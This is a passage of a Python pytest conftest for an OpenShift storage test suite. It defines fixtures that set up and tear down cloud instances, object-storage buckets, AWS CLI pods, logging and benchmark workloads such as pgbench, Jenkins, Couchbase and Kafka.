os.remove(f"/tmp/{worker}-top-output.txt")
log.info("Memory leak capture has stopped")
request.addfinalizer(finalizer)
temp_file = tempfile.NamedTemporaryFile(
mode="w+", prefix="test_status", delete=False
)
def get_flag_status():
with open(temp_file.name, "r") as t_file:
return t_file.readline()
def set_flag_status(value):
with open(temp_file.name, "w") as t_file:
t_file.writelines(value)
set_flag_status("running")
def run_memory_leak_in_bg():
"""
Function to run memory leak in background thread
Memory leak data is written in below format
date time PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
"""
oc = ocp.OCP(namespace=config.ENV_DATA["cluster_namespace"])
while get_flag_status() == "running":
for worker in node.get_worker_nodes():
filename = f"/tmp/{worker}-top-output.txt"
top_cmd = f"debug nodes/{worker} -- chroot /host top -n 2 b"
with open("/tmp/file.txt", "w+") as temp:
temp.write(
str(oc.exec_oc_cmd(command=top_cmd, out_yaml_format=False))
)
temp.seek(0)
for line in temp:
if "ceph-osd" in line:
with open(filename, "a+") as f:
f.write(str(datetime.now()))
f.write(" ")
f.write(line)
log.info("Start memory leak data capture in the test background")
thread = threading.Thread(target=run_memory_leak_in_bg)
thread.start()
@pytest.fixture()
def aws_obj():
"""
Initialize AWS instance
Returns:
AWS: An instance of AWS class
"""
aws_obj = aws.AWS()
return aws_obj
@pytest.fixture()
def ec2_instances(request, aws_obj):
"""
Get cluster instances
Returns:
dict: The ID keys and the name values of the instances
"""
# Get all cluster nodes objects
nodes = node.get_node_objs()
# Get the cluster nodes ec2 instances
ec2_instances = aws.get_instances_ids_and_names(nodes)
assert (
ec2_instances
), f"Failed to get ec2 instances for node {[n.name for n in nodes]}"
def finalizer():
"""
Make sure all instances are running
"""
# Getting the instances that are in status 'stopping' (if there are any), to wait for them to
# get to status 'stopped' so it will be possible to start them
stopping_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPING)
}
# Waiting for the instances that are in status 'stopping'
# (if there are any) to reach 'stopped'
if stopping_instances:
for stopping_instance in stopping_instances:
instance = aws_obj.get_ec2_instance(stopping_instance)
instance.wait_until_stopped()
stopped_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPED)
}
# Start the instances
if stopped_instances:
aws_obj.start_ec2_instances(instances=stopped_instances, wait=True)
request.addfinalizer(finalizer)
return ec2_instances
@pytest.fixture(scope="session")
def cld_mgr(request, rgw_endpoint):
"""
Returns a cloud manager instance that'll be used throughout the session
Returns:
CloudManager: A CloudManager resource
"""
cld_mgr = CloudManager()
def finalizer():
for client in vars(cld_mgr):
try:
getattr(cld_mgr, client).secret.delete()
except AttributeError:
log.info(f"{client} secret not found")
request.addfinalizer(finalizer)
return cld_mgr
@pytest.fixture()
def rgw_obj(request):
return rgw_obj_fixture(request)
@pytest.fixture(scope="session")
def rgw_obj_session(request):
return rgw_obj_fixture(request)
def rgw_obj_fixture(request):
"""
Returns an RGW resource that represents RGW in the cluster
Returns:
RGW: An RGW resource
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
return RGW()
else:
return None
@pytest.fixture()
def rgw_deployments(request):
"""
Return RGW deployments or skip the test.
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
# Force-skipping in case of IBM Cloud -
# https://github.com/red-hat-storage/ocs-ci/issues/3863
if config.ENV_DATA["platform"].lower() == constants.IBMCLOUD_PLATFORM:
pytest.skip(
"RGW deployments were found, but test will be skipped because of BZ1926831"
)
return rgw_deployments
else:
pytest.skip("There is no RGW deployment available for this test.")
@pytest.fixture(scope="session")
def rgw_endpoint(request):
"""
Expose RGW service and return external RGW endpoint address if available.
Returns:
string: external RGW endpoint
"""
log.info("Looking for RGW service to expose")
oc = ocp.OCP(kind=constants.SERVICE, namespace=config.ENV_DATA["cluster_namespace"])
rgw_service = oc.get(selector=constants.RGW_APP_LABEL)["items"]
if rgw_service:
if config.DEPLOYMENT["external_mode"]:
rgw_service = constants.RGW_SERVICE_EXTERNAL_MODE
else:
rgw_service = constants.RGW_SERVICE_INTERNAL_MODE
log.info(f"Service {rgw_service} found and will be exposed")
# custom hostname is provided because default hostname from rgw service
# is too long and OCP rejects it
oc = ocp.OCP(
kind=constants.ROUTE, namespace=config.ENV_DATA["cluster_namespace"]
)
route = oc.get(resource_name="noobaa-mgmt")
router_hostname = route["status"]["ingress"][0]["routerCanonicalHostname"]
rgw_hostname = f"rgw.{router_hostname}"
try:
oc.exec_oc_cmd(f"expose service/{rgw_service} --hostname {rgw_hostname}")
except CommandFailed as cmdfailed:
if "AlreadyExists" in str(cmdfailed):
log.warning("RGW route already exists.")
# new route is named after service
rgw_endpoint = oc.get(resource_name=rgw_service)
endpoint_obj = OCS(**rgw_endpoint)
def _finalizer():
endpoint_obj.delete()
request.addfinalizer(_finalizer)
return f"http://{rgw_hostname}"
else:
log.info("RGW service is not available")
@pytest.fixture()
def mcg_obj(request):
return mcg_obj_fixture(request)
@pytest.fixture(scope="session")
def mcg_obj_session(request):
return mcg_obj_fixture(request)
def mcg_obj_fixture(request, *args, **kwargs):
"""
Returns an MCG resource that's connected to the S3 endpoint
Returns:
MCG: An MCG resource
"""
if config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM:
log.warning("As openshift dedicated is used, no MCG resource is returned")
return None
mcg_obj = MCG(*args, **kwargs)
def finalizer():
if config.ENV_DATA["platform"].lower() == "aws":
mcg_obj.cred_req_obj.delete()
if kwargs.get("create_aws_creds"):
request.addfinalizer(finalizer)
return mcg_obj
@pytest.fixture()
def awscli_pod(request):
return awscli_pod_fixture(request, scope_name="function")
@pytest.fixture(scope="session")
def awscli_pod_session(request):
return awscli_pod_fixture(request, scope_name="session")
def awscli_pod_fixture(request, scope_name):
"""
Creates a new AWSCLI pod for relaying commands
Args:
scope_name (str): The name of the fixture's scope,
used for giving a descriptive name to the pod and configmap
Returns:
pod: A pod running the AWS CLI
"""
# Create the service-ca configmap to be mounted upon pod creation
service_ca_data = templating.load_yaml(constants.AWSCLI_SERVICE_CA_YAML)
service_ca_configmap_name = create_unique_resource_name(
constants.AWSCLI_SERVICE_CA_CONFIGMAP_NAME, scope_name
)
service_ca_data["metadata"]["name"] = service_ca_configmap_name
log.info("Trying to create the AWS CLI service CA")
service_ca_configmap = helpers.create_resource(**service_ca_data)
arch = get_system_architecture()
if arch.startswith("x86"):
pod_dict_path = constants.AWSCLI_POD_YAML
else:
pod_dict_path = constants.AWSCLI_MULTIARCH_POD_YAML
awscli_pod_dict = templating.load_yaml(pod_dict_path)
awscli_pod_dict["spec"]["volumes"][0]["configMap"][
"name"
] = service_ca_configmap_name
awscli_pod_name = create_unique_resource_name(
constants.AWSCLI_RELAY_POD_NAME, scope_name
)
awscli_pod_dict["metadata"]["name"] = awscli_pod_name
update_container_with_mirrored_image(awscli_pod_dict)
awscli_pod_obj = Pod(**awscli_pod_dict)
assert awscli_pod_obj.create(
do_reload=True
), f"Failed to create Pod {awscli_pod_name}"
OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE, kind="ConfigMap").wait_for_resource(
resource_name=service_ca_configmap.name, column="DATA", condition="1"
)
helpers.wait_for_resource_state(awscli_pod_obj, constants.STATUS_RUNNING)
def _awscli_pod_cleanup():
awscli_pod_obj.delete()
service_ca_configmap.delete()
request.addfinalizer(_awscli_pod_cleanup)
return awscli_pod_obj
@pytest.fixture()
def test_directory_setup(request, awscli_pod_session):
return test_directory_setup_fixture(request, awscli_pod_session)
def test_directory_setup_fixture(request, awscli_pod_session):
origin_dir, result_dir = setup_pod_directories(
awscli_pod_session, ["origin", "result"]
)
SetupDirs = namedtuple("SetupDirs", "origin_dir, result_dir")
def dir_cleanup():
test_name = get_current_test_name()
awscli_pod_session.exec_cmd_on_pod(command=f"rm -rf {test_name}")
request.addfinalizer(dir_cleanup)
return SetupDirs(origin_dir=origin_dir, result_dir=result_dir)
@pytest.fixture()
def nodes():
"""
Return an instance of the relevant platform nodes class
(e.g. AWSNodes, VMWareNodes) to be later used in the test
for nodes related operations, like nodes restart,
detach/attach volume, etc.
"""
factory = platform_nodes.PlatformNodesFactory()
nodes = factory.get_nodes_platform()
return nodes
@pytest.fixture()
def uploaded_objects(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
return uploaded_objects_fixture(
request, mcg_obj, awscli_pod, verify_rgw_restart_count
)
@pytest.fixture(scope="session")
def uploaded_objects_session(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
):
return uploaded_objects_fixture(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
)
def uploaded_objects_fixture(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
"""
Deletes all objects that were created as part of the test
Args:
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
awscli_pod (Pod): A pod running the AWSCLI tools
Returns:
list: An empty list to which tests append the paths of uploaded
objects; these objects are deleted during teardown
"""
uploaded_objects_paths = []
def object_cleanup():
for uploaded_filename in uploaded_objects_paths:
log.info(f"Deleting object {uploaded_filename}")
awscli_pod.exec_cmd_on_pod(
command=craft_s3_command("rm " + uploaded_filename, mcg_obj),
secrets=[
mcg_obj.access_key_id,
mcg_obj.access_key,
mcg_obj.s3_internal_endpoint,
],
)
request.addfinalizer(object_cleanup)
return uploaded_objects_paths
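# Illustrative usage sketch (hypothetical test body, names are examples only):
# objects uploaded through the awscli pod are appended to the returned list so
# that the finalizer above can delete them during teardown.
#
#     def test_upload_example(mcg_obj, awscli_pod, bucket_factory, uploaded_objects):
#         bucket = bucket_factory(1, "OC")[0]
#         full_object_path = f"s3://{bucket.name}/example-object"
#         awscli_pod.exec_cmd_on_pod(
#             command=craft_s3_command(f"cp /etc/hostname {full_object_path}", mcg_obj),
#             secrets=[mcg_obj.access_key_id, mcg_obj.access_key, mcg_obj.s3_internal_endpoint],
#         )
#         uploaded_objects.append(full_object_path)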
@pytest.fixture()
def verify_rgw_restart_count(request):
return verify_rgw_restart_count_fixture(request)
@pytest.fixture(scope="session")
def verify_rgw_restart_count_session(request):
return verify_rgw_restart_count_fixture(request)
def verify_rgw_restart_count_fixture(request):
"""
Verifies the RGW restart count at start and end of a test
"""
if config.ENV_DATA["platform"].lower() in constants.ON_PREM_PLATFORMS:
log.info("Getting RGW pod restart count before executing the test")
initial_counts = get_rgw_restart_counts()
def finalizer():
rgw_pods = get_rgw_pods()
for rgw_pod in rgw_pods:
rgw_pod.reload()
log.info("Verifying whether RGW pods changed after executing the test")
for rgw_pod in rgw_pods:
assert rgw_pod.restart_count in initial_counts, "RGW pod restarted"
request.addfinalizer(finalizer)
@pytest.fixture()
def rgw_bucket_factory(request, rgw_obj):
if rgw_obj:
return bucket_factory_fixture(request, rgw_obj=rgw_obj)
else:
return None
@pytest.fixture(scope="session")
def rgw_bucket_factory_session(request, rgw_obj_session):
if rgw_obj_session:
return bucket_factory_fixture(request, rgw_obj=rgw_obj_session)
else:
return None
@pytest.fixture()
def bucket_factory(request, bucket_class_factory, mcg_obj):
"""
Returns an MCG bucket factory.
If MCG object not found returns None
"""
if mcg_obj:
return bucket_factory_fixture(request, bucket_class_factory, mcg_obj)
else:
return None
@pytest.fixture(scope="session")
def bucket_factory_session(request, bucket_class_factory_session, mcg_obj_session):
"""
Returns a session-scoped MCG bucket factory.
If session-scoped MCG object not found returns None
"""
if mcg_obj_session:
return bucket_factory_fixture(
request, bucket_class_factory_session, mcg_obj_session
)
else:
return None
def bucket_factory_fixture(
request, bucket_class_factory=None, mcg_obj=None, rgw_obj=None
):
"""
Create a bucket factory. Calling this fixture creates a new bucket(s).
For a custom amount, provide the 'amount' parameter.
***Please note***
Creation of buckets by utilizing the S3 interface *does not* support bucketclasses.
Only OC/CLI buckets can support different bucketclasses.
By default, all S3 buckets utilize the default bucketclass.
Args:
bucket_class_factory: creates a new Bucket Class
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
rgw_obj (RGW): An RGW object
"""
created_buckets = []
def _create_buckets(
amount=1,
interface="S3",
verify_health=True,
bucketclass=None,
replication_policy=None,
*args,
**kwargs,
):
"""
Creates the requested amount of buckets; all created buckets are
deleted during teardown
Args:
amount (int): The amount of buckets to create
interface (str): The interface to use for creation of buckets.
S3 | OC | CLI | NAMESPACE
verify_health (bool): Whether to verify the created bucket's health
post-creation
bucketclass (dict): A dictionary describing a new
bucketclass to be created.
When None, the default bucketclass is used.
Returns:
list: A list of s3.Bucket objects, containing all the created
buckets
"""
if bucketclass:
interface = bucketclass["interface"]
current_call_created_buckets = []
if interface.lower() not in BUCKET_MAP:
raise RuntimeError(
f"Invalid interface type received: {interface}. "
f'available types: {", ".join(BUCKET_MAP.keys())}'
)
bucketclass = (
bucketclass if bucketclass is None else bucket_class_factory(bucketclass)
)
for _ in range(amount):
bucket_name = helpers.create_unique_resource_name(
resource_description="bucket", resource_type=interface.lower()
)
created_bucket = BUCKET_MAP[interface.lower()](
bucket_name,
mcg=mcg_obj,
rgw=rgw_obj,
bucketclass=bucketclass,
replication_policy=replication_policy,
*args,
**kwargs,
)
current_call_created_buckets.append(created_bucket)
created_buckets.append(created_bucket)
if verify_health:
created_bucket.verify_health()
return current_call_created_buckets
def bucket_cleanup():
for bucket in created_buckets:
log.info(f"Cleaning up bucket {bucket.name}")
try:
bucket.delete()
except ClientError as e:
if e.response["Error"]["Code"] == "NoSuchBucket":
log.warning(f"{bucket.name} could not be found in cleanup")
else:
raise
request.addfinalizer(bucket_cleanup)
return _create_buckets
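# Illustrative usage sketch: creating two OC buckets backed by a custom
# bucketclass dict. The backingstore layout below is an example only; see
# bucketclass_factory_implementation for the accepted keys.
#
#     def test_bucket_example(bucket_factory):
#         bucketclass = {
#             "interface": "OC",
#             "backingstore_dict": {"aws": [(1, "eu-central-1")]},
#         }
#         buckets = bucket_factory(amount=2, interface="OC", bucketclass=bucketclass)
#         assert len(buckets) == 2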
@pytest.fixture(scope="class")
def cloud_uls_factory(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="session")
def cloud_uls_factory_session(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="function")
def mcg_job_factory(request, bucket_factory, project_factory, mcg_obj, tmp_path):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request, bucket_factory, project_factory, mcg_obj, tmp_path
)
@pytest.fixture(scope="session")
def mcg_job_factory_session(
request, bucket_factory_session, project_factory_session, mcg_obj_session, tmp_path
):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request,
bucket_factory_session,
project_factory_session,
mcg_obj_session,
tmp_path,
)
@pytest.fixture()
def backingstore_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If MCG object not found
"""
if mcg_obj:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
else:
return None
@pytest.fixture(scope="session")
def backingstore_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
else:
return None
@pytest.fixture()
def bucket_class_factory(
request, mcg_obj, backingstore_factory, namespace_store_factory
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If MCG object not found
"""
if mcg_obj:
return bucketclass_factory_implementation(
request, mcg_obj, backingstore_factory, namespace_store_factory
)
else:
return None
@pytest.fixture(scope="session")
def bucket_class_factory_session(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return bucketclass_factory_implementation(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
)
else:
return None
@pytest.fixture()
def multiregion_mirror_setup(bucket_factory):
return multiregion_mirror_setup_fixture(bucket_factory)
@pytest.fixture(scope="session")
def multiregion_mirror_setup_session(bucket_factory_session):
return multiregion_mirror_setup_fixture(bucket_factory_session)
def multiregion_mirror_setup_fixture(bucket_factory):
# Setup
# Todo:
# add region and amount parametrization - note that `us-east-1`
# will cause an error as it is the default region. If usage of `us-east-1`
# needs to be tested, keep the 'region' field out.
bucketclass = {
"interface": "CLI",
"backingstore_dict": {"aws": [(1, "us-west-1"), (1, "us-east-2")]},
"placement_policy": "Mirror",
}
# Create a NooBucket that'll use the bucket class in order to test
# the mirroring policy
bucket = bucket_factory(1, "OC", bucketclass=bucketclass)[0]
return bucket, bucket.bucketclass.backingstores
@pytest.fixture(scope="session")
def default_storageclasses(request, teardown_factory_session):
"""
Returns dictionary with storageclasses. Keys represent reclaim policy of
storageclass. There are two storageclasses for each key. First is RBD based
and the second one is CephFS based. Storageclasses with Retain Reclaim
Policy are created from default storageclasses.
"""
scs = {constants.RECLAIM_POLICY_DELETE: [], constants.RECLAIM_POLICY_RETAIN: []}
# TODO(fbalak): Use proper constants after
# https://github.com/red-hat-storage/ocs-ci/issues/1056
# is resolved
for sc_name in ("ocs-storagecluster-ceph-rbd", "ocs-storagecluster-cephfs"):
sc = OCS(kind=constants.STORAGECLASS, metadata={"name": sc_name})
sc.reload()
scs[constants.RECLAIM_POLICY_DELETE].append(sc)
sc.data["reclaimPolicy"] = constants.RECLAIM_POLICY_RETAIN
sc.data["metadata"]["name"] += "-retain"
sc._name = sc.data["metadata"]["name"]
sc.create()
teardown_factory_session(sc)
scs[constants.RECLAIM_POLICY_RETAIN].append(sc)
return scs
@pytest.fixture(scope="class")
def install_logging(request):
"""
Setup and teardown
* The setup will deploy openshift-logging in the cluster
* The teardown will uninstall cluster-logging from the cluster
"""
def finalizer():
uninstall_cluster_logging()
request.addfinalizer(finalizer)
csv = ocp.OCP(
kind=constants.CLUSTER_SERVICE_VERSION,
namespace=constants.OPENSHIFT_LOGGING_NAMESPACE,
)
logging_csv = csv.get().get("items")
if logging_csv:
log.info("Logging is already configured, Skipping Installation")
return
log.info("Configuring Openshift-logging")
# Checks OCP version
ocp_version = get_running_ocp_version()
logging_channel = "stable" if ocp_version >= "4.7" else ocp_version
# Creates namespace openshift-operators-redhat
ocp_logging_obj.create_namespace(yaml_file=constants.EO_NAMESPACE_YAML)
# Creates an operator-group for elasticsearch
assert ocp_logging_obj.create_elasticsearch_operator_group(
yaml_file=constants.EO_OG_YAML, resource_name="openshift-operators-redhat"
)
# Set RBAC policy on the project
assert ocp_logging_obj.set_rbac(
yaml_file=constants.EO_RBAC_YAML, resource_name="prometheus-k8s"
)
# Creates subscription for elastic-search operator
subscription_yaml = templating.load_yaml(constants.EO_SUB_YAML)
subscription_yaml["spec"]["channel"] = logging_channel
helpers.create_resource(**subscription_yaml)
assert ocp_logging_obj.get_elasticsearch_subscription()
# Creates a namespace openshift-logging
ocp_logging_obj.create_namespace(yaml_file=constants.CL_NAMESPACE_YAML)
# Creates an operator-group for cluster-logging
assert ocp_logging_obj.create_clusterlogging_operator_group(
yaml_file=constants.CL_OG_YAML
)
# Creates subscription for cluster-logging
cl_subscription = templating.load_yaml(constants.CL_SUB_YAML)
cl_subscription["spec"]["channel"] = logging_channel
helpers.create_resource(**cl_subscription)
assert ocp_logging_obj.get_clusterlogging_subscription()
# Creates instance in namespace openshift-logging
cluster_logging_operator = OCP(
kind=constants.POD, namespace=constants.OPENSHIFT_LOGGING_NAMESPACE
)
log.info(f"The cluster-logging-operator {cluster_logging_operator.get()}")
ocp_logging_obj.create_instance()
@pytest.fixture
def fio_pvc_dict():
"""
PVC template for fio workloads.
Note that all 'None' values need to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture(scope="session")
def fio_pvc_dict_session():
"""
PVC template for fio workloads.
Note that all 'None' values need to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture
def fio_configmap_dict():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture(scope="session")
def fio_configmap_dict_session():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture
def fio_job_dict():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="session")
def fio_job_dict_session():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="function")
def pgsql_factory_fixture(request):
"""
Pgsql factory fixture
"""
pgsql = Postgresql()
def factory(
replicas,
clients=None,
threads=None,
transactions=None,
scaling_factor=None,
timeout=None,
sc_name=None,
):
"""
Factory to start pgsql workload
Args:
replicas (int): Number of pgbench pods to be deployed
clients (int): Number of clients
threads (int): Number of threads
transactions (int): Number of transactions
scaling_factor (int): Scaling factor
timeout (int): Time in seconds to wait
sc_name (str): Name of the storage class to use
"""
# Setup postgres
pgsql.setup_postgresql(replicas=replicas, sc_name=sc_name)
# Create pgbench benchmark
pgsql.create_pgbench_benchmark(
replicas=replicas,
clients=clients,
threads=threads,
transactions=transactions,
scaling_factor=scaling_factor,
timeout=timeout,
)
# Wait for pgbench pods to initialize and complete
pgsql.wait_for_pgbench_status(status=constants.STATUS_COMPLETED)
# Get pgbench pods
pgbench_pods = pgsql.get_pgbench_pods()
# Validate pgbench run and parse logs
pgsql.validate_pgbench_run(pgbench_pods)
return pgsql
def finalizer():
"""
Clean up
"""
pgsql.cleanup()
request.addfinalizer(finalizer)
return factory
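# Illustrative usage sketch (example values only): deploy three postgres
# replicas and run a small pgbench workload against them.
#
#     def test_pgsql_example(pgsql_factory_fixture):
#         pgsql = pgsql_factory_fixture(
#             replicas=3, clients=3, transactions=600, timeout=1800
#         )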
@pytest.fixture(scope="function")
def jenkins_factory_fixture(request):
"""
Jenkins factory fixture
"""
jenkins = Jenkins()
def factory(num_projects=1, num_of_builds=1):
"""
Factory to start jenkins workload
Args:
num_projects (int): Number of Jenkins projects
num_of_builds (int): Number of builds per project
"""
# Jenkins template
jenkins.create_ocs_jenkins_template()
# Init number of projects
jenkins.number_projects = num_projects
# Create app jenkins
jenkins.create_app_jenkins()
# Create jenkins pvc
jenkins.create_jenkins_pvc()
# Create jenkins build config
jenkins.create_jenkins_build_config()
# Wait for the Jenkins deploy pod to reach the Completed state
jenkins.wait_for_jenkins_deploy_status(status=constants.STATUS_COMPLETED)
# Init number of builds per project
jenkins.number_builds_per_project = num_of_builds
# Start Builds
jenkins.start_build()
# Wait for builds to reach the 'Complete' state
jenkins.wait_for_build_to_complete()
# Print table of builds
jenkins.print_completed_builds_results()
return jenkins
def finalizer():
"""
Clean up
"""
jenkins.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def couchbase_new_factory_fixture(request):
"""
Couchbase factory fixture using Couchbase operator
"""
couchbase = CouchBase()
def factory(
replicas=3,
run_in_bg=False,
skip_analyze=True,
sc_name=None,
num_items=None,
num_threads=None,
):
"""
Factory to start couchbase workload
Args:
replicas (int): Number of couchbase workers to be deployed
run_in_bg (bool): Whether to run IOs in the background
skip_analyze (bool): Whether to skip analysis of the run logs
sc_name (str): Name of the storage class to use
num_items (int): Number of items for the workload
num_threads (int): Number of threads for the workload
"""
# Create Couchbase subscription
couchbase.couchbase_subscription()
# Create Couchbase worker secrets
couchbase.create_cb_secrets()
# Create couchbase workers
couchbase.create_cb_cluster(replicas=replicas, sc_name=sc_name)
couchbase.create_data_buckets()
# Run couchbase workload
couchbase.run_workload(
replicas=replicas,
run_in_bg=run_in_bg,
num_items=num_items,
num_threads=num_threads,
)
# Run sanity check on data logs
couchbase.analyze_run(skip_analyze=skip_analyze)
return couchbase
def finalizer():
"""
Clean up
"""
couchbase.teardown()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def amq_factory_fixture(request):
"""
AMQ factory fixture
"""
amq = AMQ()
def factory(
sc_name,
kafka_namespace=constants.AMQ_NAMESPACE,
size=100,
replicas=3,
topic_name="my-topic",
user_name="my-user",
partitions=1,
topic_replicas=1,
num_of_producer_pods=1,
num_of_consumer_pods=1,
value="10000",
since_time=1800,
):
"""
Factory to start amq workload
Args:
sc_name (str): Name of storage class
kafka_namespace (str): Namespace where kafka cluster to be created
size (int): Size of the storage
replicas (int): Number of kafka and zookeeper pods to be created
topic_name (str): Name of the topic to be created
user_name (str): Name of the user to be created
partitions (int): Number of partitions of topic
topic_replicas (int): Number of replicas of topic
num_of_producer_pods (int): Number of producer pods to be created
num_of_consumer_pods (int): Number of consumer pods to be created
value (str): Number of messages to be sent and received
since_time (int): Number of seconds required to send the messages
"""
# Setup kafka cluster
amq.setup_amq_cluster(
sc_name=sc_name, namespace=kafka_namespace, size=size, replicas=replicas
)
# Run open messages
amq.create_messaging_on_amq(
topic_name=topic_name,
user_name=user_name,
partitions=partitions,
replicas=topic_replicas,
num_of_producer_pods=num_of_producer_pods,
num_of_consumer_pods=num_of_consumer_pods,
value=value,
)
# Wait for some time to generate msg
waiting_time = 60
log.info(f"Waiting for {waiting_time}sec to generate msg")
time.sleep(waiting_time)
# Check messages are sent and received
threads = amq.run_in_bg(
namespace=kafka_namespace, value=value, since_time=since_time
)
return amq, threads
def finalizer():
"""
Clean up
"""
# Clean up
amq.cleanup()
request.addfinalizer(finalizer)
return factory
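# Illustrative usage sketch (example values only, storage class name is an
# assumption): start an AMQ/Kafka workload on a storage class and collect the
# background validation threads returned by the factory.
#
#     def test_amq_example(amq_factory_fixture):
#         amq, threads = amq_factory_fixture(
#             sc_name=constants.DEFAULT_STORAGECLASS_RBD
#         )
#         # 'threads' come from amq.run_in_bg(); wait on them as the test requires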
@pytest.fixture
def measurement_dir(tmp_path):
"""
Returns the directory path where all measurement related results should
be stored. If 'measurement_dir' is provided by the config then it is used,
otherwise a new directory is generated.
Returns:
str: Path to measurement directory
"""
if config.ENV_DATA.get("measurement_dir"):
measurement_dir = config.ENV_DATA.get("measurement_dir")
log.info(f"Using measurement dir from configuration: {measurement_dir}")
else:
measurement_dir = os.path.join(os.path.dirname(tmp_path), "measurement_results")
if not os.path.exists(measurement_dir):
log.info(f"Measurement dir {measurement_dir} doesn't exist. Creating it.")
os.mkdir(measurement_dir)
return measurement_dir
@pytest.fixture()
def multi_dc_pod(multi_pvc_factory, dc_pod_factory, service_account_factory):
"""
Prepare multiple dc pods for the test
Returns:
list: Pod instances
"""
def factory(
num_of_pvcs=1,
pvc_size=100,
project=None,
access_mode="RWO",
pool_type="rbd",
timeout=60,
):
dict_modes = {
"RWO": "ReadWriteOnce",
"RWX": "ReadWriteMany",
"RWX-BLK": "ReadWriteMany-Block",
}
dict_types = {"rbd": "CephBlockPool", "cephfs": "CephFileSystem"}
if access_mode == "RWX-BLK" and pool_type == "rbd":
modes = dict_modes["RWX-BLK"]
create_rbd_block_rwx_pod = True
else:
modes = dict_modes[access_mode]
create_rbd_block_rwx_pod = False
pvc_objs = multi_pvc_factory(
interface=dict_types[pool_type],
access_modes=[modes],
size=pvc_size,
num_of_pvc=num_of_pvcs,
project=project,
timeout=timeout,
)
dc_pods = []
dc_pods_res = []
sa_obj = service_account_factory(project=project)
with ThreadPoolExecutor() as p:
for pvc_obj in pvc_objs:
if create_rbd_block_rwx_pod:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=constants.CEPHBLOCKPOOL,
pvc=pvc_obj,
raw_block_pv=True,
sa_obj=sa_obj,
)
)
else:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=dict_types[pool_type],
pvc=pvc_obj,
sa_obj=sa_obj,
)
)
for dc in dc_pods_res:
pod_obj = dc.result()
if create_rbd_block_rwx_pod:
log.info(
"#### setting attribute pod_type since "
f"create_rbd_block_rwx_pod = {create_rbd_block_rwx_pod}"
)
setattr(pod_obj, "pod_type", "rbd_block_rwx")
else:
setattr(pod_obj, "pod_type", "")
dc_pods.append(pod_obj)
with ThreadPoolExecutor() as p:
for dc in dc_pods:
p.submit(
helpers.wait_for_resource_state,
resource=dc,
state=constants.STATUS_RUNNING,
timeout=120,
)
return dc_pods
return factory
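# Illustrative usage sketch (example values only): create three RBD backed DC
# pods with RWO access mode inside a pre-created project.
#
#     def test_multi_dc_pod_example(multi_dc_pod, project_factory):
#         project = project_factory()
#         pods = multi_dc_pod(
#             num_of_pvcs=3, pvc_size=10, project=project,
#             access_mode="RWO", pool_type="rbd",
#         )
#         assert len(pods) == 3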
@pytest.fixture(scope="session")
def htpasswd_path(tmpdir_factory):
"""
Returns:
string: Path to HTPasswd file with additional usernames
"""
return str(tmpdir_factory.mktemp("idp_data").join("users.htpasswd"))
@pytest.fixture(scope="session")
def htpasswd_identity_provider(request):
"""
Creates HTPasswd Identity provider.
Returns:
